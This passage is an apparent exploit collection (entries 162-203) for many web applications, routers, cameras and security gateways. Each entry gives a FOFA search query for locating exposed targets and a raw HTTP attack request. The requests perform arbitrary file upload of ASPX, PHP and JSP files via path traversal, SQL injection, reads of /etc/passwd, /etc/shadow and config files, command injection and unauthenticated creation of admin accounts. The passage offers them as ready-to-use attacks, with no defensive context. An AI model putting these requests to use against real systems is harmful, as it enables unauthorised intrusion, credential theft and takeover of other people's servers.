User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 445
Content-Type: text/xml
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<UploadResume xmlns="http://tempuri.org/">
<ip>1</ip>
<fileName>../../../../dizxdell.aspx</fileName>
<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>
<tag>3</tag>
</UploadResume>
</soap:Body>
</soap:Envelope>

http://x.x.x.x/dizxdell.aspx

162. 和丰 multimedia information publishing system QH.aspx arbitrary file upload
FOFA: app="和丰山海-数字标牌"
POST /QH.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 583
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey
Accept-Encoding: gzip

------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"
Content-Type: application/octet-stream

<% response.write("ujidwqfuuqjalgkvrpqy") %>
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="action"

upload
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="responderId"

ResourceNewResponder
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="remotePath"

/opt/resources
------WebKitFormBoundaryeegvclmyurlotuey--

http://x.x.x.x/opt/resources/kjuhitjgk.aspx

163. 号卡极团 distribution management system ue_serve.php arbitrary file upload
FOFA: icon_hash="-795291075"
POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 293
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod

------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="name"

1.php
------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="upfile"; filename="1.php"
Content-Type: image/jpeg

rvjhvbhwwuooyiioxega
------iiqvnofupvhdyrcoqyuujyetjvqgocod--

164. 慧校园 (安校易) management system FileUpProductupdate.aspx arbitrary file upload
FOFA: title="智慧综合管理平台登入"
POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Content-Length: 288
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip

------dqdaieopnozbkapjacdbdthlvtlyl
Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"
Content-Type: image/jpeg

<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
------dqdaieopnozbkapjacdbdthlvtlyl--

http://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx

165. OrangeHRM 3.3.3 SQL injection
CVE-2024-36428
FOFA: app="OrangeHRM-产品"
URL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))

166. 中成科信 ticketing management platform SeatMapHandler SQL injection
FOFA:body="技术支持:北京中成科信科技发展有限公司"
POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1
Host:
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 89

Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE

167. 精益价值管理系统 (Lean Value Management System) DownLoad.aspx arbitrary file read
FOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"
GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

168. 宏景EHR OutputCode arbitrary file read
FOFA:app="HJSOFT-HCM"
GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Connection: close

169. 宏景EHR downlawbase SQL injection
FOFA:app="HJSOFT-HCM"
GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

170. 宏景EHR DisplayExcelCustomReport arbitrary file read
FOFA:body="/general/sys/hjaxmanage.js"
POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
Host: balalanengliang
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

filename=../webapps/ROOT/WEB-INF/web.xml

171. 通天星 CMSV6 vehicle positioning monitoring platform SQL injection
FOFA:body="/808gps/"
GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close

172. DT HD license plate recognition camera arbitrary file read
FOFA:app="DT-高清车牌识别摄像机"
GET /../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

173. Check Point Security Gateway arbitrary file read
CVE-2024-24919
FOFA:app="Check_Point-SSL-Network-Extender"
POST /clients/MyCRL HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

aCSHELL/../../../../../../../etc/shadow

174. 金和OA C6 FileDownLoad.aspx arbitrary file read
FOFA:app="金和网络-金和OA"
GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close

175. 金和OA C6 IncentivePlanFulfill.aspx SQL injection
FOFA:app="金和网络-金和OA"
GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

176. Telecom gateway configuration management system rewrite.php file upload
FOFA:body="img/login_bg3.png" && body="系统登录"
POST /manager/teletext/material/rewrite.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT
Connection: close

------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="tmp_name"; filename="test.php"
Content-Type: image/png

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="uploadtime"


------WebKitFormBoundaryOKldnDPT--

177. H3C router sensitive information disclosure
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
/userLogin.asp/../actionpolicy_status/../M60.cfg
/userLogin.asp/../actionpolicy_status/../GR8300.cfg
/userLogin.asp/../actionpolicy_status/../GR5200.cfg
/userLogin.asp/../actionpolicy_status/../GR3200.cfg
/userLogin.asp/../actionpolicy_status/../GR2200.cfg
/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg
/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200.cfg
/userLogin.asp/../actionpolicy_status/../ER5100.cfg
/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3260.cfg
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3200.cfg
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg
/userLogin.asp/../actionpolicy_status/../ER3108G.cfg
/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3100.cfg
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg

178. H3C campus network self-service system flexFileUpload arbitrary file upload
FOFA:header="/selfservice"
POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Content-Length: 252
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l

-----------------aqutkea7vvanpqy3rh2l
Content-Disposition: form-data; name="12234.txt"; filename="12234"
Content-Type: application/octet-stream
Content-Length: 255

12234
-----------------aqutkea7vvanpqy3rh2l--

GET /imc/primepush/%2e%2e/flex/12234.txt

179. 建文 engineering management system arbitrary file read
POST /Common/DownLoad2.aspx HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

path=../log4net.config&Name=

180. 帮管客 CRM jiliyu SQL injection
FOFA:app="帮管客-CRM"
GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

181. 润申信息科技 enterprise standardization management system UpdataLogHandler.ashx SQL injection
FOFA:"PDCA/js/_publicCom.js"
POST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20

182. 润申科技 enterprise standardization management system AddNewsHandler.ashx arbitrary user creation
FOFA:"PDCA/js/_publicCom.js"
POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

username=test1234&pwd=test1234&savedays=1

183. 广州图创 Interlib library cluster management system updOpuserPw SQL injection
FOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"
GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

184. 迅饶科技 X2Modbus gateway AddUser arbitrary user addition
FOFA:server="SunFull-Webs"
POST /soap/AddUser HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: application/xml, text/xml, */*; q=0.01
Content-Type: text/xml; charset=utf-8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
X-Requested-With: XMLHttpRequest

insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')

185. 瑞友天翼 application virtualization system SQL injection
version < 7.0.5.1
FOFA:app="REALOR-天翼应用虚拟化系统"
GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
Host: host

186. F-logic DataCube3 SQL injection
CVE-2024-31750
F-logic DataCube3 is a compact terminal measurement system for photovoltaic power generation systems.
FOFA:title=="DataCube3"
POST /admin/pr_monitor/getting_index_data.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded

req_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450

187. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA:"Mura CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1

188. 叁体-佳会视频会议 (Santi Jiahui video conferencing) attachment arbitrary file read
version <= 3.9.7
FOFA:body="/system/get_rtc_user_defined_info?site_id"
GET /attachment?file=/etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

189. 蓝网科技临床浏览系统 (Lanwon clinical browsing system) deleteStudy SQL injection
FOFA:app="LANWON-临床浏览系统"
GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

190. 短视频矩阵营销系统 (short-video matrix marketing system) poihuoqu arbitrary file read
FOFA:title=="短视频矩阵营销系统"
POST /index.php/admin/Userinfo/poihuoqu HTTP/2
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

poi=file:///etc/passwd

191. 亿赛通电子文档安全管理系统 (Esafenet electronic document security management system) NavigationAjax SQL injection
FOFA:body="/CDGServer3/index.jsp"
POST /CDGServer3/js/../NavigationAjax HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=

192. 富通天下外贸ERP (Futong Tianxia foreign trade ERP) UploadEmailAttr arbitrary file upload
FOFA:title="用户登录_富通天下外贸ERP"
POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/x-www-form-urlencoded

<% @ webhandler language="C#" class="AverageHandler" %>
using System;
using System.Web;
public class AverageHandler : IHttpHandler
{
    public bool IsReusable
    { get { return true; } }
    public void ProcessRequest(HttpContext ctx)
    {
        ctx.Response.Write("test");
    }
}

193. 山石网科云鉴安全管理系统 (Hillstone Networks 云鉴 security management system) setsystemtimeaction command execution
FOFA:body="山石云鉴主机安全管理系统"
GET /master/ajaxActions/getTokenAction.php HTTP/1.1
Host:
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1
Host:
User-Agent: Mozilla/5.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
Content-Length: 84

param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')

GET /master/img/config HTTP/1.1
Host:
User-Agent: Mozilla/5.0

194. 飞企互联-FE企业运营管理平台 (FE enterprise operations management platform) uploadAttachmentServlet arbitrary file upload
FOFA:app="FE-协作平台"
If a request to /servlet/uploadAttachmentServlet returns a response, the vulnerability is present.

POST /servlet/uploadAttachmentServlet HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk

------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"
Content-Type: text/plain

<% out.println("hello");%>
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="json"

{"iq":{"query":{"UpdateType":"mail"}}}
------WebKitFormBoundaryKNt0t4vBe8cX9rZk--

195. 飞鱼星上网行为管理系统 (Volans internet behavior management system) send_order.cgi command execution
FOFA:title=="飞鱼星企业级智能上网行为管理系统"
POST /send_order.cgi?parameter=operation HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 68

{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}

196. 河南省风速科技统一认证平台 (Henan Fengsu Technology unified authentication platform) password reset
FOFA:body="/cas/themes/zbvc/js/jquery.min.js"
POST /cas/userCtl/resetPasswordBySuper HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/json;charset=UTF-8
X-Requested-With: XMLHttpRequest
Host:
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 45
Connection: close

{"xgh":"test","newPass":"test666","email":""}

197. 浙大恩特客户资源管理系统 (Zhejiang University Entsoft customer resource management system) Quotegask_editAction SQL injection
FOFA:app="浙大恩特客户资源管理系统"
GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
Accept-Encoding: gzip, deflate
Connection: close

198. 阿里云盘 WebDAV (aliyundrive-webdav) command injection
CVE-2024-29640
GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1
Cookie: sysauth=41273cb2cffef0bb5d0653592624cf64
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close

199. cockpit system assetsmanager_upload endpoint file upload
FOFA:title="Authenticate Please!"

1. Run the POC to obtain the CSRF value and the cookie, then upload and access the result:

GET /auth/login?to=/ HTTP/1.1

Response: 200, returned value: csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"

2. Use the JWT obtained in the previous step to get the cookie:

POST /auth/check HTTP/1.1
Content-Type: application/json

{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}

Response: 200, returned value:
Set-Cookie: mysession=95524f01e238bf51bb60d77ede3bea92; path=/

POST /assetsmanager/upload HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3
Cookie: mysession=95524f01e238bf51bb60d77ede3bea92

-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="files[]"; filename="tttt.php"
Content-Type: text/php

<?php echo "tttt";unlink(__FILE__);?>
-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="folder"


-----------------------------36D28FBc36bd6feE7Fb3--

/storage/uploads/tttt.php

200. SeaCMS 海洋影视管理系统 (SeaCMS video management system) dmku SQL injection
FOFA:app="海洋CMS"
GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

201. 方正全媒体新闻采编系统 (Founder omnimedia news editing system) binary SQL injection
FOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
POST /newsedit/newsplan/task/binary.do HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1

202. 微擎系统 (WeEngine system) AccountEdit arbitrary file upload
FOFA:body="/Widgets/WidgetCollection/"
Obtain the __VIEWSTATE and __EVENTVALIDATION values:
GET /User/AccountEdit.aspx HTTP/1.1
Host: 滑板人之家
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31
Content-Length: 0

Replace the __VIEWSTATE and __EVENTVALIDATION values:
POST /User/AccountEdit.aspx HTTP/1.1
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687

-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__VIEWSTATE"

__VIEWSTATE
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__EVENTVALIDATION"

__EVENTVALIDATION
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"
Content-Type: text/plain

Hello World!
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"

上传图片
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"


-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"


-----------------------------786435874t38587593865736587346567358735687--

/_data/Uploads/1123.txt

203. 红海云EHR (Redsea Cloud eHR) PtFjk file upload
FOFA:body="RedseaPlatform"
POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1
Host: x.x.x.x
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Length: 210

------WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Disposition: form-data; name="fj_file"; filename="11.jsp"
Content-Type:image/jpeg

<% out.print("hello,eHR");%>
------WebKitFormBoundaryt7WbDl1tXogoZys4--
